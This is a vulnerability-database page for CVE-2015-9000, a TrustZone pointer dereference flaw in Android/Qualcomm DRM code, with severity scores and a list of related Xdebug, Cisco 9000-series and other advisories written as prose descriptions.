CVE-2015-9000
published 2017-05-16CVE-2015-9000: In TrustZone an untrusted pointer dereference vulnerability can potentially occur in a DRM routine in all Android releases from CAF using the Linux kernel.
PriorityP432high7.8CVSS 3.0
AVLACLPRNUIRSUCHIHAH
EPSS
0.58%
43.6th percentile
In TrustZone an untrusted pointer dereference vulnerability can potentially occur in a DRM routine in all Android releases from CAF using the Linux kernel.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| android | — | — | |
| qualcomm_inc | all_qualcomm_products | — | — |
CVSS provenance
nvdv3.07.8HIGHCVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_cisco10.0CRITICAL
vendor_redhat9.3CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
xdebug: Xdebug Remote Debugger Command Execution
vendor_redhat·2025-07-23·CVSS 9.3
CVE-2015-10141 [CRITICAL] CWE-306 xdebug: Xdebug Remote Debugger Command Execution
xdebug: Xdebug Remote Debugger Command Execution
An unauthenticated OS command injection vulnerability exists within Xdebug versions 2.5.5 and earlier, a PHP debugging extension developed by Derick Rethans. When remote debugging is enabled, Xdebug listens on port 9000 and accepts debugger protocol commands without authentication. An attacker can send a crafted eval command over this interface to execute arbitrary PHP code, which may invoke system-level functions such as system() or passthru(). This results in full compromise of the host under the privileges of the web server user.
A code injection flaw was found in Xdebug. When a user enables remote debugging, Xdebug does not require authentication and will accept input from any user who can access the debug port. Enabling remote debuggi
Android
CVE-2015-9000: Android Security Bulletin 2017-04-01
CVE: CVE-2015-9000
Severity: CRITICAL
References: A-35441076**
vendor_android·2017-04-01·CVSS 7.8
CVE-2015-9000 [HIGH] CVE-2015-9000: Android Security Bulletin 2017-04-01
CVE: CVE-2015-9000
Severity: CRITICAL
References: A-35441076**
Android Security Bulletin 2017-04-01
CVE: CVE-2015-9000
Severity: CRITICAL
References: A-35441076**
Cisco
Cisco Nexus 9000 Series ACI Mode Switch ICMP Record Route Vulnerability
vendor_cisco·2016-02-03·CVSS 7.8
CVE-2015-6398 [HIGH] CWE-399 Cisco Nexus 9000 Series ACI Mode Switch ICMP Record Route Vulnerability
Cisco Nexus 9000 Series ACI Mode Switch ICMP Record Route Vulnerability
A vulnerability in the ICMP implementation in the Cisco Nexus 9000 Series Application Centric Infrastructure (ACI) Mode Switch could allow an unauthenticated, remote attacker to cause the switch to reload, resulting in a denial of service (DoS) condition.
The vulnerability is due to improper handling of an ICMP packet with the IPv4 Type 7 option for record route. An attacker could exploit this vulnerability by sending an ICMP packet with the record route option to an interface on the affected switch. An exploit could allow the attacker to cause a DoS condition because the switch will reload each time the ICMP packet is received.
Cisco has released software updates that address this vulnerability. A workaround that a
Cisco
Cisco Unified Computing System Manager and Cisco Firepower 9000 Remote Command Execution Vulnerability
vendor_cisco·2016-01-21·CVSS 10.0
CVE-2015-6435 [CRITICAL] CWE-78 Cisco Unified Computing System Manager and Cisco Firepower 9000 Remote Command Execution Vulnerability
Cisco Unified Computing System Manager and Cisco Firepower 9000 Remote Command Execution Vulnerability
A vulnerability in a CGI script in the Cisco Unified Computing System (UCS) Manager and the Cisco Firepower 9000 Series appliance could allow an unauthenticated, remote attacker to execute arbitrary commands on the Cisco UCS Manager or the Cisco Firepower 9000 Series appliance.
The vulnerability is due to unprotected calling of shell commands in the CGI script. An attacker could exploit this vulnerability by sending a crafted HTTP request to the Cisco UCS Manager or the Cisco Firepower 9000 Series appliance. An exploit could allow the attacker to execute arbitrary commands on the Cisco UCS Manager or the Cisco Firepower 9000 Series appliance.
Cisco has released software updates that ad
Cisco
Cisco Firepower 9000 Operating System Command Injection Vulnerability
vendor_cisco·2015-11-23·CVSS 6.0
CVE-2015-6380 [MEDIUM] CWE-78 Cisco Firepower 9000 Operating System Command Injection Vulnerability
Cisco Firepower 9000 Operating System Command Injection Vulnerability
A vulnerability in a user script supplied with Cisco Firepower 9000 could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system with the privileges of the authenticated user. The script can be accessed via the web interface.
The vulnerability is due to lack of input validation of the parameters passed to the user script. An attacker could exploit this vulnerability by authenticating to the device and crafting user input to specific script files to inject arbitrary commands. These commands are at the privilege level of the authenticated user.
Cisco has not released software updates that address this vulnerability. There are no workarounds that address this vulnerabilit
Cisco
Cisco Firepower 9000 Series Switch Clickjacking Vulnerability
vendor_cisco·2015-11-18·CVSS 5.0
CVE-2015-6374 [MEDIUM] CWE-20 Cisco Firepower 9000 Series Switch Clickjacking Vulnerability
Cisco Firepower 9000 Series Switch Clickjacking Vulnerability
A vulnerability in the web interface of the Cisco Firepower 9000 Series Switch could allow an unauthenticated, remote attacker to affect the integrity of the device though a clickjacking or phishing attack.
The vulnerability is due to the lack of proper input sanitization of iFrame data in the HTTP requests sent to the device. An attacker could exploit this vulnerability by sending crafted HTTP packets with malicious iFrame data. An exploit could allow the attacker to perform a clickjacking or phishing attack where the user is tricked into clicking a malicious link. Protection mechanisms should be used to help prevent this type of attack.
Cisco has not released software updates that address this vulnerability. Workarounds tha
Cisco
Cisco Firepower 9000 Cross-Site Request Forgery Vulnerability
vendor_cisco·2015-11-18·CVSS 5.0
CVE-2015-6373 [MEDIUM] CWE-352 Cisco Firepower 9000 Cross-Site Request Forgery Vulnerability
Cisco Firepower 9000 Cross-Site Request Forgery Vulnerability
A vulnerability in the Cisco Firepower 9000 Series Switch which could allow an unauthenticated, remote attacker to execute unwanted actions.
The vulnerability is due to a lack of cross-site request forgery (CSRF) protection. An attacker could exploit this vulnerability by tricking the user of a web application into executing an adverse action.
Cisco has not released software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available.
This advisory is available at the following link: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151117-firepower3
Cisco
Cisco Firepower 9000 Command Injection at Management I/O Command-Line Interface Vulnerability
vendor_cisco·2015-11-17·CVSS 4.3
CVE-2015-6370 [MEDIUM] CWE-78 Cisco Firepower 9000 Command Injection at Management I/O Command-Line Interface Vulnerability
Cisco Firepower 9000 Command Injection at Management I/O Command-Line Interface Vulnerability
A vulnerability in the Management I/O (MIO) command-line interface (CLI) command execution of Cisco Firepower 9000 devices could allow an authenticated, local attacker to access the underlying operating system and execute commands at the root privilege level.
The vulnerability is due to insufficient sanitization of user-supplied input at the CLI. An attacker could exploit this vulnerability by using crafted user input to execute commands on the underlying operating system. The user has to be logged-in to the device with valid admin credentials.
Cisco has not released software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available.
This advisory
Cisco
Cisco Firepower 9000 Persistent Cross-Site Scripting Vulnerability
vendor_cisco·2015-11-17·CVSS 4.3
CVE-2015-6372 [MEDIUM] CWE-79 Cisco Firepower 9000 Persistent Cross-Site Scripting Vulnerability
Cisco Firepower 9000 Persistent Cross-Site Scripting Vulnerability
A vulnerability in the HTTP web-based management interface of Cisco Firepower 9000 devices could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the affected system.
The vulnerability is due to insufficient input validation of a user-supplied value. An attacker could exploit this vulnerability by convincing a user to click on a specific link.
Cisco has not released software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available.
This advisory is available at the following link: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151117-firepower2
Cisco
Cisco Firepower 9000 Arbitrary File Read Access Script Vulnerability
vendor_cisco·2015-11-17·CVSS 4.0
CVE-2015-6371 [MEDIUM] CWE-200 Cisco Firepower 9000 Arbitrary File Read Access Script Vulnerability
Cisco Firepower 9000 Arbitrary File Read Access Script Vulnerability
A vulnerability in a user script supplied with Cisco Firepower 9000 devices could allow an authenticated, remote attacker to view any file on the device, even ones that should be restricted to authenticated users.
The vulnerability is due to lack of input validation of the parameters passed to certain user scripts. An attacker could exploit this vulnerability by authenticating to the device and crafting user input to certain script files to view files that should be restricted.
Cisco has not released software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available.
This advisory is available at the following link: https://sec.cloudapps.cisco.com/security/center/content/C
Cisco
Cisco Firepower 9000 USB Kernel Denial of Service Vulnerability
vendor_cisco·2015-11-17·CVSS 4.7
CVE-2015-6369 [MEDIUM] CWE-20 Cisco Firepower 9000 USB Kernel Denial of Service Vulnerability
Cisco Firepower 9000 USB Kernel Denial of Service Vulnerability
A vulnerability in the USB driver of Cisco Firepower 9000 could allow an unauthenticated, local attacker with physical access to the device to send invalid USB commands to the kernel and cause a denial of service (DoS) condition.
The vulnerability is due to insufficient sanitization of USB input parameters. An attacker could exploit this vulnerability by using crafted USB user inputs to send invalid USB commands to the kernel.
Cisco has not released software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available.
This advisory is available at the following link: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151116-fire
Cisco
Cisco Firepower 9000 Unauthenticated File Access Vulnerability
vendor_cisco·2015-11-16·CVSS 5.0
CVE-2015-6368 [MEDIUM] CWE-264 Cisco Firepower 9000 Unauthenticated File Access Vulnerability
Cisco Firepower 9000 Unauthenticated File Access Vulnerability
A vulnerability in the web interface of the Cisco Firepower 9000 Series Switches could allow an unauthenticated, remote attacker to view certain files on the device that should be restricted.
The vulnerability is due to lack of proper authentication checks when a request to download and view a file is received. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device.
Cisco has not released software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available.
This advisory is available at the following link: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151116-firepower
Cisco
Cisco ASR 9000 Series Aggregation Services Routers Denial of Service Vulnerability
vendor_cisco·2015-09-18·CVSS 5.0
CVE-2015-6301 [MEDIUM] CWE-399 Cisco ASR 9000 Series Aggregation Services Routers Denial of Service Vulnerability
Cisco ASR 9000 Series Aggregation Services Routers Denial of Service Vulnerability
A vulnerability in the DHCP version 6 (DHCPv6) server implementation of Cisco IOS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.
The vulnerability is due to improper handling of certain DHCPv6 packets. An attacker could exploit this vulnerability by sending these DHCPv6 packets to be processed by an affected device. An exploit could allow the attacker to cause a reset of an affected process.
Cisco has confirmed the vulnerability and released software updates.
To exploit this vulnerability a remote attacker does not need to authenticate to pass the crafted DHCPv6 packets to the targeted device. This increases the likelihood of a possible exploit.
C
Cisco
Cisco Nexus 9000 Series Switches Reserved VLAN Number Vulnerability
vendor_cisco·2015-09-16·CVSS 4.8
CVE-2015-6295 [MEDIUM] CWE-399 Cisco Nexus 9000 Series Switches Reserved VLAN Number Vulnerability
Cisco Nexus 9000 Series Switches Reserved VLAN Number Vulnerability
A vulnerability in the handling of incoming Layer 2 packets tagged with a Cisco Nexus 9000 Series Switch (N9K) reserved VLAN number could allow an unauthenticated, adjacent attacker to cause a partial denial of service (DoS) condition due to increased CPU utilization and possible control plane instability. In addition, Layer 2 packets, which should be dropped by the switch, may be incorrectly forwarded to the connected interfaces.
The vulnerability is due to lack of validation of the VLAN number in the Layer 2 packet. An attacker could exploit this vulnerability by sending a crafted Layer 2 packet tagged with an N9K reserved VLAN number. An exploit could allow the attacker to cause a partial DoS condition due to increase
Cisco
Cisco Nexus 9000 Series Resource Exhaustion Denial of Service Vulnerability
vendor_cisco·2015-08-12·CVSS 6.8
CVE-2015-4301 [MEDIUM] CWE-399 Cisco Nexus 9000 Series Resource Exhaustion Denial of Service Vulnerability
Cisco Nexus 9000 Series Resource Exhaustion Denial of Service Vulnerability
A vulnerability in Cisco Nexus 9000 Series software could allow an authenticated, remote attacker to cause a denial of service (DoS) condition.
An attacker could exploit the vulnerability by copying large files to the device file system. Processing the large files could cause the device to stop responding, resulting in a DoS condition.
Cisco has confirmed the vulnerability and released software updates.
To exploit the vulnerability, an attacker must have authentication credentials to log in to the device and privileges that allow copying large files to the file system. These restrictions greatly reduce the potential for exploitation.
Cisco
Cisco ASR 9000 Series Aggregation Services Routers tmp Files Denial of Service Vulnerability
vendor_cisco·2015-08-11·CVSS 4.9
CVE-2015-4277 [MEDIUM] CWE-399 Cisco ASR 9000 Series Aggregation Services Routers tmp Files Denial of Service Vulnerability
Cisco ASR 9000 Series Aggregation Services Routers tmp Files Denial of Service Vulnerability
A vulnerability in Cisco ASR 9000 Series Aggregation Services Routers could allow an authenticated, local attacker to produce excessive tmp/*config files, causing the system to become unresponsive.
The vulnerability is due to the abrupt closure of the user's vty sessions after the commit/end in global configuration mode. An attacker could exploit this vulnerability by using methods to generate excessive tmp/*config files, causing the affected system's memory to be exhausted, resulting in a denial of service (DoS) condition.
Cisco has confirmed the vulnerability and released software updates.
To exploit this vulnerability, an attacker must authenticate and have local access to the targeted devi
Cisco
Cisco Firepower 9000 Series Unauthenticated Web Page Vulnerability
vendor_cisco·2015-07-27·CVSS 5.0
CVE-2015-4287 [MEDIUM] CWE-264 Cisco Firepower 9000 Series Unauthenticated Web Page Vulnerability
Cisco Firepower 9000 Series Unauthenticated Web Page Vulnerability
A vulnerability in the web interface of the Cisco Firepower 9000 device could allow an unauthenticated, remote attacker to access a web page that should be restricted.
The vulnerability is due to improper authentication validation. An attacker could exploit this vulnerability by accessing a certain web page on the Cisco Firepower 9000 device that should be restricted to authenticated users. An exploit could allow the attacker to access details about the Cisco Firepower 9000 device that should be available only to an authenticated user.
Cisco has confirmed the vulnerability; however, software updates are not available.
To exploit this vulnerability, an attacker may need access to trusted, internal networks to access a c
Cisco
Cisco Application Policy Infrastructure Controller Access Control Vulnerability
vendor_cisco·2015-07-22·CVSS 8.5
CVE-2015-4235 [HIGH] CWE-264 Cisco Application Policy Infrastructure Controller Access Control Vulnerability
Cisco Application Policy Infrastructure Controller Access Control Vulnerability
A vulnerability in the cluster management configuration of the Cisco Application Policy Infrastructure Controller (APIC) and the Cisco Nexus 9000 Series ACI Mode Switch could allow an authenticated, remote attacker to access the APIC as the root user.
The vulnerability is due to improper implementation of access controls in the APIC filesystem. An attacker could exploit this vulnerability by accessing the cluster management configuration of the APIC. An exploit could allow the attacker to gain access to the APIC as the root user and perform root-level commands.
Cisco has released software updates that address this vulnerability.
This advisory is available at the following link:
https://sec.cloudapps.cisco.co
Cisco
Cisco IOS XR Concurrent Data Management Replication Process BGP Process Denial of Service Vulnerability
vendor_cisco·2015-07-21·CVSS 5.0
CVE-2015-4284 [MEDIUM] CWE-20 Cisco IOS XR Concurrent Data Management Replication Process BGP Process Denial of Service Vulnerability
Cisco IOS XR Concurrent Data Management Replication Process BGP Process Denial of Service Vulnerability
A vulnerability in the Concurrent Data Management Replication process of Cisco IOS XR for ASR 9000 Series Aggregation Services Routers could allow an unauthenticated, remote attacker to cause a reload of the Border Gateway Protocol (BGP) process.
The vulnerability is due to improper processing of malformed BGPv4 packets on an affected device. An attacker could exploit this vulnerability by sending malformed BGPv4 packets to be processed by an affected device. An exploit could allow the attacker to cause a reload of the BGP process.
Cisco has confirmed the vulnerability and released software updates.
To exploit this vulnerability, the attacker would need to send malformed BGPv4 packe
Cisco
Cisco Nexus 9000 Series Software Password Exposure Vulnerability
vendor_cisco·2015-06-23·CVSS 4.0
CVE-2015-4213 [MEDIUM] CWE-200 Cisco Nexus 9000 Series Software Password Exposure Vulnerability
Cisco Nexus 9000 Series Software Password Exposure Vulnerability
A vulnerability in Cisco Nexus 9000 Series Software could allow an authenticated, remote attacker to expose passwords in plain text format.
The vulnerability is due to older versions of the affected software retaining the ability to decrypt passwords. An attacker could exploit this vulnerability to expose passwords in plain text format.
Cisco has confirmed the vulnerability and released software updates.
To exploit this vulnerability, an attacker must authenticate to the targeted device. This access requirement reduces the likelihood of a successful exploit.
Cisco indicates through the CVSS score that functional exploit code exists; however, the code is not known to be publicly available.
Cisco
Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers Denial of Service Vulnerability
vendor_cisco·2015-06-22·CVSS 5.7
CVE-2015-4205 [MEDIUM] CWE-399 Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers Denial of Service Vulnerability
Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers Denial of Service Vulnerability
A vulnerability in flow control processing of Cisco IOS XR Software for Cisco ASR 9000 Series Routers could allow an unauthenticated, adjacent attacker to cause a Network Processing Unit (NPU) chip reset and potentially a reload of the affected line card.
The vulnerability is due to improper processing of crafted IEEE 802.3x flow control pause frames. An attacker could exploit this vulnerability by sending a number of crafted IEEE 802.3x flow control pause frames to an affected device. An exploit could allow the attacker to cause an NPU chip reset and potentially a reload of the affected line card.
Cisco has confirmed the vulnerability and released software updates.
To exploit
Cisco
Cisco IOS XR Software BVI Routed Packet Denial of Service Vulnerability
vendor_cisco·2015-04-15·CVSS 7.1
CVE-2015-0695 [HIGH] CWE-399 Cisco IOS XR Software BVI Routed Packet Denial of Service Vulnerability
Cisco IOS XR Software BVI Routed Packet Denial of Service Vulnerability
A vulnerability in the packet-processing code of Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers (ASR) could allow an unauthenticated, remote attacker to cause a lockup and eventual reload of a network processor chip and the line card that is processing traffic. Only Typhoon-based line cards on Cisco ASR 9000 Series Aggregation Services Routers are affected by this vulnerability.
The vulnerability is due to improper processing of packets that are routed via the bridge-group virtual interface (BVI) when any of the following features are configured: Unicast Reverse Path Forwarding (uRPF), policy-based routing (PBR), quality of service (QoS), or access control lists (ACLs). An attacker could
Cisco
Cisco Aggregate Services Router 9000 ASR9K Security Bypass Vulnerability
vendor_cisco·2015-04-09·CVSS 5.0
CVE-2015-0694 [MEDIUM] CWE-264 Cisco Aggregate Services Router 9000 ASR9K Security Bypass Vulnerability
Cisco Aggregate Services Router 9000 ASR9K Security Bypass Vulnerability
A vulnerability in the Object-ACL matching process of Cisco Aggregation Services Router 9000 (ASR9K) could allow an unauthenticated, remote attacker to bypass the protection offered by a configured access control list (ACL) on an affected device.
The vulnerability is due to ASR9K incorrectly handling host access control entries by incorrectly matching any address instead of the specified host address. An attacker could exploit this vulnerability to bypass the access control list leading to traffic loss or unwanted permits.
Cisco has confirmed the vulnerability and released software updates.
The impact of an exploit depends on ACLs in use on the affected system. Attackers who could bypass the configured ACLs could
Cisco
Cisco Nexus 9000 Series Denial of Service Vulnerability
vendor_cisco·2015-04-02·CVSS 6.3
CVE-2015-0686 [MEDIUM] CWE-399 Cisco Nexus 9000 Series Denial of Service Vulnerability
Cisco Nexus 9000 Series Denial of Service Vulnerability
A vulnerability in the SNMP subsystem of Cisco Nexus 9000 software could allow an authenticated, remote attacker to cause a denial of service (DoS) condition.
The vulnerability occurs when the High Availability (HA) policy is set to Reset in the affected software. An authenticated, remote attacker could exploit this vulnerability to cause an affected device to reload unexpectedly, resulting in a DoS condition.
Cisco has confirmed the vulnerability and released software updates.
To exploit this vulnerability, an attacker must authenticate to the targeted device. This access requirement decreases the likelihood of a successful exploit.
This vulnerability affects only devices running Cisco Nexus 9000 Series platforms.
Cisco indica
Cisco
Cisco IOS XR Software DHCPv4 Server Denial of Service Vulnerability
vendor_cisco·2015-03-24·CVSS 5.0
CVE-2015-0672 [MEDIUM] CWE-399 Cisco IOS XR Software DHCPv4 Server Denial of Service Vulnerability
Cisco IOS XR Software DHCPv4 Server Denial of Service Vulnerability
A vulnerability in the DHCP process of Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.
The vulnerability is due to improper processing of crafted DHCP messages on a targeted interface of an affected device. An unauthenticated, remote attacker could exploit this vulnerability by sending large amounts of crafted DHCP messages to a targeted interface on an affected device. A successful exploit could cause the device to stop responding to DHCP requests on that interface, resulting in a DoS condition.
Cisco has confirmed the vulnerability and released software updates.
To exploit this vulnerability, an
Cisco
Cisco MDS 9000 Series Denial of Service Vulnerability
vendor_cisco·2015-01-14·CVSS 5.0
CVE-2015-0582 [MEDIUM] CWE-399 Cisco MDS 9000 Series Denial of Service Vulnerability
Cisco MDS 9000 Series Denial of Service Vulnerability
A vulnerability in the high availability (HA) subsystem of Cisco NX-OS running on MDS 9000 series devices could allow an unauthenticated, remote attacker to cause a denial of device (DoS) condition.
The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted traffic to a device.
Cisco has confirmed the vulnerability in a security notice and released software updates.
To exploit this vulnerability, an attacker may need access to trusted, internal networks behind a firewall to send crafted packets to the targeted device. This access requirement may reduce the likelihood of a successful exploit.
Cisco indicates through the CVSS score that functional exploit code exists; h
Cisco
Cisco IOS XR Software BVI Routed Packet Denial of Service Vulnerability
vendor_cisco
CVE-2015-0695 Cisco IOS XR Software BVI Routed Packet Denial of Service Vulnerability
CVE-2015-0695: Cisco IOS XR Software BVI Routed Packet Denial of Service Vulnerability
A vulnerability in the packet-processing code of Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers (ASR) could allow an unauthenticated, remote attacker to cause a lockup and eventual reload of a network processor chip and the line card that is processing traffic. Only Typhoon-based line cards on Cisco ASR 9000 Series Aggregation Services Routers are affected by this vulnerability. The vulnerability is due to improper processing of packets that are routed via the bridge-group virtual interface (BVI) when any of the following features are configured: Unicast Reverse Path Forwarding (uRPF), policy-based routing (PBR), quality of service (QoS), or access control lists (ACLs). An a
Cisco
Cisco Application Policy Infrastructure Controller Access Control Vulnerability
vendor_cisco
CVE-2015-4235 Cisco Application Policy Infrastructure Controller Access Control Vulnerability
CVE-2015-4235: Cisco Application Policy Infrastructure Controller Access Control Vulnerability
A vulnerability in the cluster management configuration of the Cisco Application Policy Infrastructure Controller (APIC) and the Cisco Nexus 9000 Series ACI Mode Switch could allow an authenticated, remote attacker to access the APIC as the root user. The vulnerability is due to improper implementation of access controls in the APIC filesystem. An attacker could exploit this vulnerability by accessing the cluster management configuration of the APIC. An exploit could allow the attacker to gain access to the APIC as the root user and perform root -level commands. Cisco has released software updates that address this vulnerability. This advisory is available at the following link: https://sec.cloud
Cisco
Cisco Firepower 9000 Series Switch Clickjacking Vulnerability
vendor_cisco
CVE-2015-6374 Cisco Firepower 9000 Series Switch Clickjacking Vulnerability
CVE-2015-6374: Cisco Firepower 9000 Series Switch Clickjacking Vulnerability
A vulnerability in the web interface of the Cisco Firepower 9000 Series Switch could allow an unauthenticated, remote attacker to affect the integrity of the device though a clickjacking or phishing attack. The vulnerability is due to the lack of proper input sanitization of iFrame data in the HTTP requests sent to the device. An attacker could exploit this vulnerability by sending crafted HTTP packets with malicious iFrame data. An exploit could allow the attacker to perform a clickjacking or phishing attack where the user is tricked into clicking a malicious link. Protection mechanisms should be used to help prevent this type of attack. Cisco has not released software updates that address this vulnerability.
CWE
Cisco
Cisco Firepower 9000 Cross-Site Request Forgery Vulnerability
vendor_cisco
CVE-2015-6373 Cisco Firepower 9000 Cross-Site Request Forgery Vulnerability
CVE-2015-6373: Cisco Firepower 9000 Cross-Site Request Forgery Vulnerability
A vulnerability in the Cisco Firepower 9000 Series Switch which could allow an unauthenticated, remote attacker to execute unwanted actions. The vulnerability is due to a lack of cross-site request forgery (CSRF) protection. An attacker could exploit this vulnerability by tricking the user of a web application into executing an adverse action. Cisco has not released software updates that address this vulnerability.
CWE: CWE-352, CWE-352
Bug IDs: CSCux10611
Cisco
Cisco Nexus 9000 Series ACI Mode Switch ICMP Record Route Vulnerability
vendor_cisco
CVE-2015-6398 Cisco Nexus 9000 Series ACI Mode Switch ICMP Record Route Vulnerability
CVE-2015-6398: Cisco Nexus 9000 Series ACI Mode Switch ICMP Record Route Vulnerability
A vulnerability in the ICMP implementation in the Cisco Nexus 9000 Series Application Centric Infrastructure (ACI) Mode Switch could allow an unauthenticated, remote attacker to cause the switch to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to improper handling of an ICMP packet with the IPv4 Type 7 option for record route. An attacker could exploit this vulnerability by sending an ICMP packet with the record route option to an interface on the affected switch. An exploit could allow the attacker to cause a DoS condition because the switch will reload each time the ICMP packet is received. Cisco has released software updates that address this vulnerability. A worka
Cisco
Cisco Firepower 9000 Persistent Cross-Site Scripting Vulnerability
vendor_cisco
CVE-2015-6372 Cisco Firepower 9000 Persistent Cross-Site Scripting Vulnerability
CVE-2015-6372: Cisco Firepower 9000 Persistent Cross-Site Scripting Vulnerability
A vulnerability in the HTTP web-based management interface of Cisco Firepower 9000 devices could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the affected system. The vulnerability is due to insufficient input validation of a user-supplied value. An attacker could exploit this vulnerability by convincing a user to click on a specific link. Cisco has not released software updates that address this vulnerability.
CWE: CWE-79, CWE-79
Bug IDs: CSCux10614
Cisco
Cisco Firepower 9000 Operating System Command Injection Vulnerability
vendor_cisco
CVE-2015-6380 Cisco Firepower 9000 Operating System Command Injection Vulnerability
CVE-2015-6380: Cisco Firepower 9000 Operating System Command Injection Vulnerability
A vulnerability in a user script supplied with Cisco Firepower 9000 could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system with the privileges of the authenticated user. The script can be accessed via the web interface. The vulnerability is due to lack of input validation of the parameters passed to the user script. An attacker could exploit this vulnerability by authenticating to the device and crafting user input to specific script files to inject arbitrary commands. These commands are at the privilege level of the authenticated user. Cisco has not released software updates that address this vulnerability. There are no
CWE: CWE-78, CWE-78
Bug IDs: C
Cisco
Cisco Firepower 9000 Unauthenticated File Access Vulnerability
vendor_cisco
CVE-2015-6368 Cisco Firepower 9000 Unauthenticated File Access Vulnerability
CVE-2015-6368: Cisco Firepower 9000 Unauthenticated File Access Vulnerability
A vulnerability in the web interface of the Cisco Firepower 9000 Series Switches could allow an unauthenticated, remote attacker to view certain files on the device that should be restricted. The vulnerability is due to lack of proper authentication checks when a request to download and view a file is received. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. Cisco has not released software updates that address this vulnerability.
CWE: CWE-264, CWE-264
Bug IDs: CSCux10608
Cisco
Cisco Unified Computing System Manager and Cisco Firepower 9000 Remote Command Execution Vulnerability
vendor_cisco
CVE-2015-6435 Cisco Unified Computing System Manager and Cisco Firepower 9000 Remote Command Execution Vulnerability
CVE-2015-6435: Cisco Unified Computing System Manager and Cisco Firepower 9000 Remote Command Execution Vulnerability
A vulnerability in a CGI script in the Cisco Unified Computing System (UCS) Manager and the Cisco Firepower 9000 Series appliance could allow an unauthenticated, remote attacker to execute arbitrary commands on the Cisco UCS Manager or the Cisco Firepower 9000 Series appliance. The vulnerability is due to unprotected calling of shell commands in the CGI script. An attacker could exploit this vulnerability by sending a crafted HTTP request to the Cisco UCS Manager or the Cisco Firepower 9000 Series appliance. An exploit could allow the attacker to execute arbitrary commands on the Cisco UCS Manager or the Cisco Firepower 9000 Series appliance. Cisco has released software upd
Cisco
Cisco Firepower 9000 Arbitrary File Read Access Script Vulnerability
vendor_cisco
CVE-2015-6371 Cisco Firepower 9000 Arbitrary File Read Access Script Vulnerability
CVE-2015-6371: Cisco Firepower 9000 Arbitrary File Read Access Script Vulnerability
A vulnerability in a user script supplied with Cisco Firepower 9000 devices could allow an authenticated, remote attacker to view any file on the device, even ones that should be restricted to authenticated users. The vulnerability is due to lack of input validation of the parameters passed to certain user scripts. An attacker could exploit this vulnerability by authenticating to the device and crafting user input to certain script files to view files that should be restricted. Cisco has not released software updates that address this vulnerability.
CWE: CWE-200, CWE-200
Bug IDs: CSCux10621
Cisco
Cisco Firepower 9000 USB Kernel Denial of Service Vulnerability
vendor_cisco
CVE-2015-6369 Cisco Firepower 9000 USB Kernel Denial of Service Vulnerability
CVE-2015-6369: Cisco Firepower 9000 USB Kernel Denial of Service Vulnerability
A vulnerability in the USB driver of Cisco Firepower 9000 could allow an unauthenticated, local attacker with physical access to the device to send invalid USB commands to the kernel and cause a denial of service (DoS) condition. The vulnerability is due to insufficient sanitization of USB input parameters. An attacker could exploit this vulnerability by using crafted USB user inputs to send invalid USB commands to the kernel. Cisco has not released software updates that address this vulnerability.
CWE: CWE-20, CWE-20
Bug IDs: CSCux10531
Cisco
Cisco Firepower 9000 Command Injection at Management I/O Command-Line Interface Vulnerability
vendor_cisco
CVE-2015-6370 Cisco Firepower 9000 Command Injection at Management I/O Command-Line Interface Vulnerability
CVE-2015-6370: Cisco Firepower 9000 Command Injection at Management I/O Command-Line Interface Vulnerability
A vulnerability in the Management I/O (MIO) command-line interface (CLI) command execution of Cisco Firepower 9000 devices could allow an authenticated, local attacker to access the underlying operating system and execute commands at the root privilege level. The vulnerability is due to insufficient sanitization of user-supplied input at the CLI. An attacker could exploit this vulnerability by using crafted user input to execute commands on the underlying operating system. The user has to be logged-in to the device with valid admin credentials. Cisco has not released software updates that address this vulnerability.
CWE: CWE-78, CWE-78
Bug IDs: CSCux10576, CSCux10578
GHSA
GHSA-wvvh-9xxx-c3m6: In TrustZone an untrusted pointer dereference vulnerability can potentially occur in a DRM routine in all Android releases from CAF using the Linux ke
ghsa_unreviewed·2022-05-17
CVE-2015-9000 [HIGH] CWE-476 GHSA-wvvh-9xxx-c3m6: In TrustZone an untrusted pointer dereference vulnerability can potentially occur in a DRM routine in all Android releases from CAF using the Linux ke
In TrustZone an untrusted pointer dereference vulnerability can potentially occur in a DRM routine in all Android releases from CAF using the Linux kernel.
No detection rules found.
Exploit-DB
Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)
exploitdb·2025-07-22·CVSS 4.3
CVE-2015-6176 [MEDIUM] Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)
Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)
---
# Titles: Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)
